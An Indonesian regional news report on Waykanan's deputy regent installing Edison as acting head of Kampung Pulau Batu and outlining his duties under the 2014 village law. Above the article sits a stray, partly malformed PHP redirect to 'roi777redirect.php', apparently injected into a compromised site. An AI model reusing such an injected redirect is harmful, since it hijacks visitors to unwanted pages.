header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Wabup Edward Lantik Penjabat Kakam Pulau Batu -
Wabup Edward Lantik Penjabat Kakam Pulau Batu

TRANSLAMPUNG, NEGERI AGUNG –  Wakil Bupati Waykanan Edward Anthony atas nama Bupati Waykanan, melantik dan mengambil sumpah Edison sebagai Penjabat Kepala Kampung Pulau Batu Kecamatan Negeri Agung di balai kampung setempat, Senin (26/3).

Dalam pidatonya Wabup Edward mengatakan, pengangkatan Edison menjadi penjabat kepala kampung merupakan suatu amanah untuk memimpin Kampung Pulau Batu, karena dianggap mampu untuk mengemban tugas. Oleh karena itu hendaknya Saudara dapat menjaga amanah ini dengan penuh tanggung jawab, bekerjalah dan laksanakan tugas dengan sungguh-sungguh dan penuh rasa tanggungjawab.

“Sesuai dengan fungsi dan tugas Saudara, yaitu mempersiapkan dan melaksanakan Pemilihan kepala Kampung sesuai dengan peraturan perundang-undangan yang berlaku, Menyelenggarakan Pemerintahan Kampung sampai dengan terpilihnya kepala kampung hasil pemilihan. Melaksanakan kegiatan lainnya sesuai dengan hak dan kewajiban yang diberikan kepada saudara  sebagai penjabat kepala kampung, meliputi pembinaan Administrasi Keuangan Kantor, Tata usaha, dan Keagrariaan, penyusunan program dan penyelenggaraan pembinaan ekonomi kampung dan penyusunan Program dan penyelenggaraan pembinaan sektor produksi dan distribusi pertanian,  perkebunan, perikanan,  dan kehutanan,” terangnya.

Lebih jauh dikatakan Wabup, sebagaimana telah diamanatkan dalam Undang-undang Nomor 6 tahun 2014 tentang desa antara lain mengatur tentang Kedudukan dan Jenis Desa, Penataan Desa, Kewenangan Desa, Penyelenggaraan Pemerintahan Desa, Hak dan Kewajiban Desa dan Masyarakat Desa, Keuangan Desa dan Aset Desa, serta Pembangunan Desa dan Pembangunan Kawasan Perdesaan.

“Undang-undang tersebut telah menjamin bagi kampung untuk dapat berkembang dan mengembangkan otonomi kampung. Muara dari semua itu adalah agar mampu menyelenggarakan rumah tangganya sendiri, memperkuat kedudukan Pemerintah Kampung sehingga makin mampu menggerakan masyarakat untuk berpartisipasi dalam pembangunan serta mampu menjalankan administrasi kampung dengan baik dan efektif.

Dalam kesempatan ini saya memberi penekanan untuk menjadi perhatian Saudara sebagai Penjabat Kepala Kampung”, imbuhnya.(Yudi)

News Reporter